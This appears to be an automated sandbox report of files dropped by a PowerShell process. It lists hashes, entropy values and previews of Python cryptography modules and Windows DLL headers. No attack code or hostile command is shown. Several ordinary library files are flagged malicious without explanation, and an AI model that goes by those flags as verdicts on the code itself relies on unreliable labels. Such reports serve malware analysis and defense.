                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):779
                                                                                                                                                                                                                              Entropy (8bit):4.819439474706594
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1sumDc9v5Wb6SSkBXM6WhieoHvsPVEzmSqQeEFAcVG/Ebbj9jWAEsI:1sTDg5ESkOhNZPMmSq2FoM9jRI
                                                                                                                                                                                                                              MD5:630FCFB160AFD4A4B095C35901777556
                                                                                                                                                                                                                              SHA1:0F039C3A2C5205D2105A79B5EB2777884DC8E490
                                                                                                                                                                                                                              SHA-256:AD79E152A2C83EE90AC61FF7245DF570673FBE28720D9DE8E07E2FDDBF0E51DB
                                                                                                                                                                                                                              SHA-512:9ED88DA711066739EDB47EFB65755A57F9C18402A9AD5C112CF32BE13B97615C2C835A46C8E4E5CD89CBDB5EE6A9BE181A4CC42A1D6F4617F8AACB3C43F76878
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from .TurboSHAKE128 import TurboSHAKE....def new(**kwargs):.. """Create a new TurboSHAKE256 object..... Args:.. domain (integer):.. Optional - A domain separation byte, between 0x01 and 0x7F... The default value is 0x1F... data (bytes/bytearray/memoryview):.. Optional - The very first chunk of the message to hash... It is equivalent to an early call to :meth:`update`..... :Return: A :class:`TurboSHAKE` object.. """.... domain_separation = kwargs.get('domain', 0x1F).. if not (0x01 <= domain_separation <= 0x7F):.. raise ValueError("Incorrect domain separation value (%d)" %.. domain_separation).. data = kwargs.get('data').. return TurboSHAKE(64, domain_separation, data=data)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):318
                                                                                                                                                                                                                              Entropy (8bit):5.138819601387305
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:1REYBXa4REsuB9cebopy1LxyJQmUUzrIY3MT7O3ymK95lvdgzSNFIF:1REYBXa4RE1B9YSsumtvIY3eH1dmF
                                                                                                                                                                                                                              MD5:0F8CE87AD72ECACADED5EB6869C0C063
                                                                                                                                                                                                                              SHA1:4C8EBDA5C1826749B747BF268036DC11A1FD9CC3
                                                                                                                                                                                                                              SHA-256:86DEA501F8ED56BAE7652415243B38845AB1C94A1E4AD0E737A98A37A80235EA
                                                                                                                                                                                                                              SHA-512:8CD3AF34C3FD94E6DBE15575BB3AC6C84AFBAF14067066E53EEE3A727866C5E626E323C6ED4736186E21056D4A27EF57184DFAE378A9B8E53210F340051649ED
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from typing import Union..from typing_extensions import TypedDict, Unpack, NotRequired....from .TurboSHAKE128 import TurboSHAKE....Buffer = Union[bytes, bytearray, memoryview]....class Args(TypedDict):.. domain: NotRequired[int].. data: NotRequired[Buffer]....def new(**kwargs: Unpack[Args]) -> TurboSHAKE: .....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):14848
                                                                                                                                                                                                                              Entropy (8bit):5.212941287344097
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:2F/1nb2mhQtkRySMfJ2ycxFzShJD9bAal2QDeJKcqgQx2QY:M2fKRQB2j8JD2fJagQx2QY
                                                                                                                                                                                                                              MD5:F4EDB3207E27D5F1ACBBB45AAFCB6D02
                                                                                                                                                                                                                              SHA1:8EAB478CA441B8AD7130881B16E5FAD0B119D3F0
                                                                                                                                                                                                                              SHA-256:3274F49BE39A996C5E5D27376F46A1039B6333665BB88AF1CA6D37550FA27B29
                                                                                                                                                                                                                              SHA-512:7BDEBF9829CB26C010FCE1C69E7580191084BCDA3E2847581D0238AF1CAA87E68D44B052424FDC447434D971BB481047F8F2DA1B1DEF6B18684E79E63C6FBDC5
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%..... ......P.....................................................`..........................................9......|:..d....`.......P..@............p..,....3...............................2..@............0...............................text...X........................... ..`.rdata.......0....... ..............@..@.data...8....@.......0..............@....pdata..@....P.......2..............@..@.rsrc........`.......6..............@..@.reloc..,....p.......8..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):14336
                                                                                                                                                                                                                              Entropy (8bit):5.181291194389683
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:hF/1nb2mhQt7fSOp/CJPvADQHKtxSOvbcqgEvcM+:N2fNKOZWPIDnxVlgEvL
                                                                                                                                                                                                                              MD5:9D28433EA8FFBFE0C2870FEDA025F519
                                                                                                                                                                                                                              SHA1:4CC5CF74114D67934D346BB39CA76F01F7ACC3E2
                                                                                                                                                                                                                              SHA-256:FC296145AE46A11C472F99C5BE317E77C840C2430FBB955CE3F913408A046284
                                                                                                                                                                                                                              SHA-512:66B4D00100D4143EA72A3F603FB193AFA6FD4EFB5A74D0D17A206B5EF825E4CC5AF175F5FB5C40C022BDE676BA7A83087CB95C9F57E701CA4E7F0A2FCE76E599
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%..... ......P.....................................................`.........................................09.......9..d....`.......P..@............p..,....3...............................2..@............0...............................text...8........................... ..`.rdata..4....0......................@..@.data...8....@......................@....pdata..@....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..,....p.......6..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):14336
                                                                                                                                                                                                                              Entropy (8bit):5.140195114409974
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:RsiHXqpo0cUp8XnUp8XjEQnlDtJI6rcqgcx2:f6DcUp8XUp8AclDA69gcx2
                                                                                                                                                                                                                              MD5:8A92EE2B0D15FFDCBEB7F275154E9286
                                                                                                                                                                                                                              SHA1:FA9214C8BBF76A00777DFE177398B5F52C3D972D
                                                                                                                                                                                                                              SHA-256:8326AE6AD197B5586222AFA581DF5FE0220A86A875A5E116CB3828E785FBF5C2
                                                                                                                                                                                                                              SHA-512:7BA71C37AAF6CB10FC5C595D957EB2846032543626DE740B50D7CB954FF910DCF7CEAA56EB161BAB9CC1F663BADA6CA71973E6570BAC7D6DA4D4CC9ED7C6C3DA
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%..... ......P.....................................................`..........................................9......0:..d....`.......P..(............p..,....4...............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...h....@......................@....pdata..(....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..,....p.......6..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):13824
                                                                                                                                                                                                                              Entropy (8bit):5.203867759982304
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:WsiHXqpwUiv6wPf+4WVrd1DFrCqwWwcqgfvE:s6biio2Pd1DFmlgfvE
                                                                                                                                                                                                                              MD5:FE16E1D12CF400448E1BE3FCF2D7BB46
                                                                                                                                                                                                                              SHA1:81D9F7A2C6540F17E11EFE3920481919965461BA
                                                                                                                                                                                                                              SHA-256:ADE1735800D9E82B787482CCDB0FBFBA949E1751C2005DCAE43B0C9046FE096F
                                                                                                                                                                                                                              SHA-512:A0463FF822796A6C6FF3ACEBC4C5F7BA28E7A81E06A3C3E46A0882F536D656D3F8BAF6FB748008E27F255FE0F61E85257626010543FC8A45A1E380206E48F07C
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%............P.....................................................`.........................................p8...... 9..d....`.......P..(............p..,...@3...............................2..@............0...............................text...X........................... ..`.rdata..p....0......................@..@.data...p....@.......,..............@....pdata..(....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):15360
                                                                                                                                                                                                                              Entropy (8bit):5.478301937972917
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:hZ9WXA7M93g8U7soSchhiLdjM5J6ECTGmDZkRsP0rcqgjPrvE:8Q0gH7zSccA5J6ECTGmDua89gjPrvE
                                                                                                                                                                                                                              MD5:34EBB5D4A90B5A39C5E1D87F61AE96CB
                                                                                                                                                                                                                              SHA1:25EE80CC1E647209F658AEBA5841F11F86F23C4E
                                                                                                                                                                                                                              SHA-256:4FC70CB9280E414855DA2C7E0573096404031987C24CF60822854EAA3757C593
                                                                                                                                                                                                                              SHA-512:82E27044FD53A7309ABAECA06C077A43EB075ADF1EF0898609F3D9F42396E0A1FA4FFD5A64D944705BBC1B1EBB8C2055D8A420807693CC5B70E88AB292DF81B7
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%. ..........P.....................................................`..........................................8.......9..d....`.......P..X............p..,....3...............................1..@............0...............................text............ .................. ..`.rdata.......0.......$..............@..@.data........@.......2..............@....pdata..X....P.......4..............@..@.rsrc........`.......8..............@..@.reloc..,....p.......:..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):18432
                                                                                                                                                                                                                              Entropy (8bit):5.69608744353984
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:nkP5RjF7GsIyV6Lx41NVYaVmtShQRKAa8+DSngkov:onx7RI26LuuHKz8+DbN
                                                                                                                                                                                                                              MD5:42C2F4F520BA48779BD9D4B33CD586B9
                                                                                                                                                                                                                              SHA1:9A1D6FFA30DCA5CE6D70EAC5014739E21A99F6D8
                                                                                                                                                                                                                              SHA-256:2C6867E88C5D3A83D62692D24F29624063FCE57F600483BAD6A84684FF22F035
                                                                                                                                                                                                                              SHA-512:1F0C18E1829A5BAE4A40C92BA7F8422D5FE8DBE582F7193ACEC4556B4E0593C898956065F398ACB34014542FCB3365DC6D4DA9CE15CB7C292C8A2F55FB48BB2B
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%.*... ......P.....................................................`..........................................I.......J..d....p.......`..................,....D..............................PC..@............@...............................text....).......*.................. ..`.rdata.......@......................@..@.data...8....P.......>..............@....pdata.......`.......@..............@..@.rsrc........p.......D..............@..@.reloc..,............F..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):19456
                                                                                                                                                                                                                              Entropy (8bit):5.7981108922569735
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:qPHNP3MjevhSY/8EBbVxcJ0ihTLdFDuPHgj+kf4D:sPcKvr/jUJ0sbDGAj+t
                                                                                                                                                                                                                              MD5:AB0BCB36419EA87D827E770A080364F6
                                                                                                                                                                                                                              SHA1:6D398F48338FB017AACD00AE188606EB9E99E830
                                                                                                                                                                                                                              SHA-256:A927548ABEA335E6BCB4A9EE0A949749C9E4AA8F8AAD481CF63E3AC99B25A725
                                                                                                                                                                                                                              SHA-512:3580FB949ACEE709836C36688457908C43860E68A36D3410F3FA9E17C6A66C1CDD7C081102468E4E92E5F42A0A802470E8F4D376DAA4ED7126818538E0BD0BC4
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.0..........P.....................................................`..........................................H.......I..d....p.......`..X...............,....C...............................A..@............@...............................text..../.......0.................. ..`.rdata.......@.......4..............@..@.data........P.......B..............@....pdata..X....`.......D..............@..@.rsrc........p.......H..............@..@.reloc..,............J..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):22016
                                                                                                                                                                                                                              Entropy (8bit):5.865452719694432
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:y1jwGPJHLvzcY1EEerju9LcTZ6RO3RouLKtcyDNOcwgjxo:QjwyJUYToZwOLuzDNB1j
                                                                                                                                                                                                                              MD5:C8FE3FF9C116DB211361FBB3EA092D33
                                                                                                                                                                                                                              SHA1:180253462DD59C5132FBCCC8428DEA1980720D26
                                                                                                                                                                                                                              SHA-256:25771E53CFECB5462C0D4F05F7CAE6A513A6843DB2D798D6937E39BA4B260765
                                                                                                                                                                                                                              SHA-512:16826BF93C8FA33E0B5A2B088FB8852A2460E0A02D699922A39D8EB2A086E981B5ACA2B085F7A7DA21906017C81F4D196B425978A10F44402C5DB44B2BF4D00A
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.8... ......P.....................................................`..........................................Z.......[..d............p..................,... T...............................R..@............P...............................text....6.......8.................. ..`.rdata.......P.......<..............@..@.data........`.......L..............@....pdata.......p.......N..............@..@.rsrc................R..............@..@.reloc..,............T..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):22016
                                                                                                                                                                                                                              Entropy (8bit):5.867732744112887
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:51jwGPJHLxzcY1EEerju9LcTZ6RO3RouLKtcyDNIegjxo:rjwyJOYToZwOLuzDNI7j
                                                                                                                                                                                                                              MD5:A442EA85E6F9627501D947BE3C48A9DD
                                                                                                                                                                                                                              SHA1:D2DEC6E1BE3B221E8D4910546AD84FE7C88A524D
                                                                                                                                                                                                                              SHA-256:3DBCB4D0070BE355E0406E6B6C3E4CE58647F06E8650E1AB056E1D538B52B3D3
                                                                                                                                                                                                                              SHA-512:850A00C7069FFDBA1EFE1324405DA747D7BD3BA5D4E724D08A2450B5A5F15A69A0D3EAF67CEF943F624D52A4E2159A9F7BDAEAFDC6C689EACEA9987414250F3B
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.8... ......P.....................................................`..........................................Z.......[..d............p..................,... T...............................R..@............P...............................text....6.......8.................. ..`.rdata.......P.......<..............@..@.data........`.......L..............@....pdata.......p.......N..............@..@.rsrc................R..............@..@.reloc..,............T..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):27136
                                                                                                                                                                                                                              Entropy (8bit):5.860044313282322
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:xFDL3RqE3MjjQ95UnLa+1WT1aA7qHofg5JptfISH2mDDXfgjVx2:jDLh98jjRe+1WT1aAeIfMzxH2mDDIj
                                                                                                                                                                                                                              MD5:59BA0E05BE85F48688316EE4936421EA
                                                                                                                                                                                                                              SHA1:1198893F5916E42143C0B0F85872338E4BE2DA06
                                                                                                                                                                                                                              SHA-256:C181F30332F87FEECBF930538E5BDBCA09089A2833E8A088C3B9F3304B864968
                                                                                                                                                                                                                              SHA-512:D772042D35248D25DB70324476021FB4303EF8A0F61C66E7DED490735A1CC367C2A05D7A4B11A2A68D7C34427971F96FF7658D880E946C31C17008B769E3B12F
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.J..."......P.....................................................`......................................... l.......m..d...............................,....e...............................d..@............`...............................text...hH.......J.................. ..`.rdata..X....`.......N..............@..@.data................`..............@....pdata...............b..............@..@.rsrc................f..............@..@.reloc..,............h..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):27136
                                                                                                                                                                                                                              Entropy (8bit):5.917025846093607
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:tFYLXRqEnMgj969GUnLa+1WT1aA7qHofg5JptfIS320DXwElrgjhig:PYLB9Mgj0e+1WT1aAeIfMzx320DXD+j
                                                                                                                                                                                                                              MD5:8194D160FB215498A59F850DC5C9964C
                                                                                                                                                                                                                              SHA1:D255E8CCBCE663EE5CFD3E1C35548D93BFBBFCC0
                                                                                                                                                                                                                              SHA-256:55DEFCD528207D4006D54B656FD4798977BD1AAE6103D4D082A11E0EB6900B08
                                                                                                                                                                                                                              SHA-512:969EEAA754519A58C352C24841852CF0E66C8A1ADBA9A50F6F659DC48C3000627503DDFB7522DA2DA48C301E439892DE9188BF94EEAF1AE211742E48204C5E42
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.J..."......P.....................................................`..........................................l.......m..d...............................,...@f...............................e..@............`...............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data................`..............@....pdata...............b..............@..@.rsrc................f..............@..@.reloc..,............h..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8180
                                                                                                                                                                                                                              Entropy (8bit):5.450099815844347
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:9M5CPUNnMXrQ8UGeRi4t5UD73B0LjDG5G8//MoI3bO30C7Zi2MBQ/aPlYHEFKDhm:uMXPUUX6LsVEr47U+ydYyahImss/KL
                                                                                                                                                                                                                              MD5:F4F15A303B6908C1B5712820C03D5F54
                                                                                                                                                                                                                              SHA1:A8C1782004C7E9A8C7535AB0F2F7DA967170D70F
                                                                                                                                                                                                                              SHA-256:537A03AF33BABD9DDE479A45B2F540AF7B7C2932E0CB464F18931051D1B92B4C
                                                                                                                                                                                                                              SHA-512:9DC57CC147167960B13D485A3A6B91263C8B92BC0DB515F3B16239EF1E64580398884E553BC1CE6DE92C4F8764AE0B128B0909BB98084A068A4E3FC128D5B4F5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf. ..............................d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.g.Z.d.d.d.d.d.d.d.d.d.d.d.d...Z.e.j...........................D.....c.i.c.]...\...}.}.|.|.......c.}.}.Z...G.d...d.e.........Z.d.d...Z.y.c...c.}.}.w.)......)...bord..tobytes)...unhexlify)...BLAKE2s)...strxor)...get_random_bytes..new..HMACz.1.2.840.113549.2.7z.1.2.840.113549.2.8z.1.2.840.113549.2.9z.1.2.840.113549.2.10z.1.2.840.113549.2.11z.1.2.840.113549.2.12z.1.2.840.113549.2.13z.2.16.840.1.101.3.4.2.13z.2.16.840.1.101.3.4.2.14z.2.16.840.1.101.3.4.2.15z.2.16.840.1.101.3.4.2.16).z.1.3.14.3.2.26z.2.16.840.1.101.3.4.2.4z.2.16.840.1.101.3.4.2.1z.2.16.840.1.101.3.4.2.2z.2.16.840.1.101.3.4.2.3z.2.16.840.1.101.3.4.2.5z.2.16.840.1.101.3.4.2.6z.2.16.840.1.101.3.4.2.7z.2.16.840.1.101.3.4.2.8z.2.16.840.1.101.3.4.2.9z.2.16.840.1.101.3.4.2.10c.....................B.....e.Z.d.Z.d.Z.d.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.).r....aB...An HMAC hash object.. Do not instantiate d
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6376
                                                                                                                                                                                                                              Entropy (8bit):5.285509011649434
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:H0oYYfYBMZx4eXw1Qq7aym42MQssSoPFFKcm9t4ibJn5UMma0FZ4ct:UqfYOZw7u+Q0mv5m9/nZort
                                                                                                                                                                                                                              MD5:403D2D8E38CF534E3C983C7858A00611
                                                                                                                                                                                                                              SHA1:4D6CCC56EFFCB1F6ACDCDC0114CAC5F8D626B865
                                                                                                                                                                                                                              SHA-256:FE13654F91C71D592F8F9CE67AEFE17D719CD963BB11379236DDACA4B295BFA0
                                                                                                                                                                                                                              SHA-512:F8F1637B46B3057ED47D0178FE24AEFD733F6AC3872A27B2BB0373AF48B8528F00B1744D2400DDEBCE91DBA455B0328051BD42CAA2E4FD051074AF95C1094137
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf..........................p.....d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.....G.d...d.e.........Z.d...Z.y.)......)...unhexlify)...bord..tobytes..is_bytes)...get_random_bytes.....)...cSHAKE128..SHA3_256)..._bytepad.._encode_str.._right_encodec.....................:.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.)...KMAC_Hashz[A KMAC hash object.. Do not instantiate directly.. Use the :func:`new` function.. c...........................d.|.z...|._.........|.|._.........d.|._.........t.........t.........t.........|.................|.........}.|.j...................|.|.d.........|._.........|.r.|.j...................j...................|...........y.y.).Nz.2.16.840.1.101.3.4.2.s....KMAC)...oid..digest_size.._macr....r....r......_new.._cshake..update)...self..data..key..mac_len..custom..oid_variant..cshake..rate..partial_newXs.... .DC:\Users\xbov\Desktop\pyops\Lib\site-packages\Crypto/Hash/KMAC128.py..__init__z.KMA
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1911
                                                                                                                                                                                                                              Entropy (8bit):5.458364469197651
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:/Lq8lJnt6yV2rMmjXShH/ZDBFdmMiNFcnQ1BXj:/7JnXUMmyRDBFd0FcQz
                                                                                                                                                                                                                              MD5:96D8EA4DFD004CADF6F990DBD7F2F7A5
                                                                                                                                                                                                                              SHA1:297BB740E7343DFEB5F40AE1BDD5A4B44E8DCD7A
                                                                                                                                                                                                                              SHA-256:F610BF0B4A33D81CE5A4E61B354902989EA809330EF96A6C6865683A9887C12A
                                                                                                                                                                                                                              SHA-512:95657BC9BE697E679FD9141947CDF377207A580473BF19189A237F47B5C0F2F8B8D7887FBDF36E5A18B54A4ED761E2A56F250BC608EBC1A576BFFA8C49582E2C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf................................d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d...Z.y.)......)...is_bytes.....)...KMAC_Hash)...cSHAKE256c.....................l.....|.j...................d.d.........}.t.........|.........s.t.........d...........t.........|.........d.k...r.t.........d...........|.j...................d.d.........}.|.j...................d.d.........}.|.d.k...r.t.........d...........|.j...................d.d.........}.|.r.t.........d.t.........|.........z.............t.........|.|.|.|.d.t.........d.........S.).a....Create a new KMAC256 object... Args:. key (bytes/bytearray/memoryview):. The key to use to compute the MAC.. It must be at least 256 bits long (32 bytes).. data (bytes/bytearray/memoryview):. Optional. The very first chunk of the message to authenticate.. It is equivalent to an early call to :meth:`KMAC_Hash.update`.. mac_len (integer):. Optional. The size of the authentication tag,
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6912
                                                                                                                                                                                                                              Entropy (8bit):4.980385698486305
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:KfThBwnQq/5ggBzvCf1kVhc4tHSjGuCHnXgS2AkuKGZaIGAKg:Kfd6QqRzRakFHKHiWAkuLZ5Kg
                                                                                                                                                                                                                              MD5:8F04BA60831222E96DCD79257BB6ABF4
                                                                                                                                                                                                                              SHA1:466920CFAF2D28D5A868AF1EC8AFF0D81829EDE0
                                                                                                                                                                                                                              SHA-256:107431FEC8052A403190D90D6D921EBD21F0D10971E37E06C671ABE719F3E69F
                                                                                                                                                                                                                              SHA-512:A54A4FEA3F39DA786751F9A5F7798F610DA67CF053EEA43F290A313B19EED89B493169F083739841BEEFA1C156EDFDE7E994F8C71A7A896D30A23D2399A6425F
                                                                                                                                                                                                                              Malicious:false
